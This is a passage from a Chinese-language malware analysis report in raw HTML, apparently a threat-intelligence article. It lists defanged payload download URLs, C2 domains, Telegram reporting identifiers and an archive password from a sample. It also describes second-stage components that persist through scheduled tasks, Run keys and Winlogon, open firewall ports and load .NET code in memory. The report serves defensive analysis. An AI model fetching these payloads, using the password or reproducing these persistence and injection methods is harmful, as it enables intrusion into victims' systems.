leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0311/0504dbau.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up16OneSync.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Up17WinHealhCare.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0222/0224GHonedrive_sync.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;color:#C00000;"><span leaf="">hxxps://dev.azure.com/sagonbretzpr/f70c627a-789c-4281-8b4e-99fa76b8bfd3/_apis/git/repositories/0239f5e1-3b3e-4f53-a525-7861596f8d9b/items?path=/0207/0207Pureservice.7z&amp;versionDescriptor%5BversionOptions%5D=0&amp;versionDescriptor%5BversionType%5D=0&amp;versionDescriptor%5Bversion%5D=main&amp;resolveLfs=true&amp;%24format=octetStream&amp;api-version=5.0&amp;download=true</span></span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">样本中的其他解密字符串如下：</span></p><table style="overflow-wrap:break-word;color:rgb(43, 48, 59);font-family:-apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size:16px;font-style:normal;font-variant-ligatures:normal;font-variant-caps:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-transform:none;widows:2;word-spacing:0px;-webkit-text-stroke-width:0px;white-space:normal;text-decoration-thickness:initial;text-decoration-style:initial;text-decoration-color:initial;min-width:302px;"><tbody><tr style="overflow-wrap: break-word;"><th data-colwidth="277" align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">字符串</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hxxps://pastebin.com/raw/5tmHDYrf</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">存放链接hxxps://github.com/mountains-and-lakes/mountains/releases/download/mountains/lednew.7z</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hxxps://mikolirentryifosttry.info/api/check/</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">C2 URL</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">#Soft0427</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">和发送Telegram消息有关</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hxxps://hkdk.events/djbk1i9hp0sqoh</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">和发送Telegram消息有关</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">-1003724698225</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">和发送Telegram消息有关</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hxxps://pastebin.com/raw/M6KthA5Z</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">存放解压后续载荷的密码，&#34;8TDk2FBsKG5UN2NNc3p&#34;</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">hxxps://snippet.host/uikosx/raw</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">存放解压后续载荷的密码，&#34;8TDk2FBsKG5UN2NNc3p&#34;</span></p></td></tr><tr style="overflow-wrap: break-word;"><td data-colwidth="277" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">8TDk2FBsKG5UN2NNc3p</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">解压后续载荷的密码</span></p></td></tr></tbody></table><h3 style="overflow-wrap: break-word;display: table;padding: 0px 0.2em;margin: 2em auto;color: rgb(55, 113, 187);background: rgb(240, 243, 250);font-size: 17.6px;font-weight: bold;text-align: center;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;letter-spacing: normal;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">（四）二阶段组件</span></h3><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">获取的部分二阶段组件信息如下</span></p><table style="overflow-wrap: break-word;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><tbody><tr style="overflow-wrap: break-word;"><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">文件名</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">PE创建时间</span></p></th><th align="left" style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;background: rgba(0, 0, 0, 0.05);max-width: 100%;"><p><span leaf="">说明</span></p></th></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">OneSync.exe/WinHealhCare.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-02-07</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">安装编排+计划任务+TG回传</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">onedrive_sync.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-02-24</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">Run持久化+memexec（唯一32位组件）</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">vicloud.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-05-04</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">配置服务主题轻量加载器</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">svc_service.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-05-06</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">服务化驻留+CLR宿主+NT注入</span></p></td></tr><tr style="overflow-wrap: break-word;"><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">autodate.exe</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">2026-05-07</span></p></td><td style="overflow-wrap: break-word;border: 1px solid rgb(223, 223, 223);padding: 0.25em 0.5em;color: rgb(43, 48, 59);word-break: break-all;max-width: 100%;"><p><span leaf="">服务管理器主题轻量加载器</span></p></td></tr></tbody></table><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">下载的后续载荷连接C2：zkevopenanu[.]cfd。</span></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.34629629629629627" data-s="300,640" data-type="png" data-w="1080" type="block" data-imgfileid="100035001" src="https://wechat2rss.xlab.app/img-proxy/?k=43adb65d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FodcL3w4qOqibnpwWSOvGYkIQtr8I2rNLmfxK7WIr2FRXBZUxqHFmwBuSNqRN6kCS1gSbUWwXt1X1cHdG5gCaa6VFaFNaia6o4AAicHZvjMytoY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">(1) OneSync.exe / WinHealhCare.exe</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">两者为同模版变种——相同OEP地址0x1CA7DC、相同核心字符串、相同TG凭据、相同计划任务框架。WinHealhCare.exe的拼写为Healh，而非Health。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">计划任务伪装名如下，可选的17个任务名覆盖浏览器同步、云同步、显卡驱动、系统维护。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6275" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034987" src="https://wechat2rss.xlab.app/img-proxy/?k=bf4155a6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOqicWhex94mT3hGJSWH949rGvE4auHYCPGXzK6zcfNHTHR3GuYmMwTPMDr5xicMYhBG7h4DeAeBGicSbicq9NetNvvp8Q0gFa9YWsUI%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过Telegram上报状态。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7125" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034994" src="https://wechat2rss.xlab.app/img-proxy/?k=cdc161c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FodcL3w4qOqicsFaNVIZTgWqZQvhmXFzqHiad7IS4ncdLnete8BpuicmcYfdwV9wC1SJNLNUIsFPpiboGtX8PkHGRMtLZHupx3gicqdJWqpGUlQVA%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">本地开启34254端口并绑定socket监听，用于实现组件之间的协调。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf=""><span textstyle="" style="font-weight: bold;">（2）svc_service.exe</span></span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组件是驻留核心，大部分核心逻辑在函数sub_140004968中。</span></p><p nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.545" data-type="jpeg" data-w="800" style="overflow-wrap: break-word;display: block;max-width: 100%;margin: 0.1em auto 0.5em;border-radius: 4px;height: auto;color: rgb(43, 48, 59);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: normal;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;" data-imgfileid="100034990" src="https://wechat2rss.xlab.app/img-proxy/?k=8d9723ca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FodcL3w4qOq8V8olxd4Q55cuJs6LiazrbqiaXbfdw35VjSv9FnawAS9gwzgMDvGiaInE8a13Xcj5m8rjLATZ8iaWP4epe2PVR4iaZSghVSDkDRKhM%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">该组件具有通过计划任务、注册表RUN键、Winlogon用户初始化、Startup快捷方式等4种模式实现持久化驻留的能力。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">通过netsh命令执行”advfirewall firewall add rule”，添加对56001/57001/57002 三个端口的防火墙规则，与一阶段样本powershell放行端口一致。</span></p><p style="overflow-wrap: break-word;margin: 1.5em 8px;letter-spacing: 0.1em;color: rgb(43, 48, 59);word-break: break-all;hyphens: auto;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;"><span leaf="">在进程中加载CLR（clroxide v1.1.1），完全在内存执行.NET assembly，相关字符串如下:</span></p><table style="border-collapse:collapse;border:none;mso-border-alt:solid windowtext .5pt;mso-yfti-tbllook:1184;mso-padding-alt:0cm 5.4pt 0cm 5.4pt;"><tbody><tr style="mso-yfti-irow:0;mso-yfti-firstrow:yes;mso-yfti-lastrow:yes;"><td data-colwidth="553" width="553" valign="top" style="border: 1pt solid windowtext;padding: 0cm 5.4pt;"><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">[*] Loading CLR with clroxide...</span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">[+] CLR loaded successfully </span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">[*] Executing assembly... </span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">Could not retrieve ICLRMetaHost </span></span></p><p style="line-height:115%;"><span lang="EN-US" style="font-size:12.0pt;line-height:115%;font-family:&#34;Times New Roman&#34;,serif;mso-fareast-font-family:仿宋;"><span leaf="">[-] Failed to get CLR context: </span></span></p><p 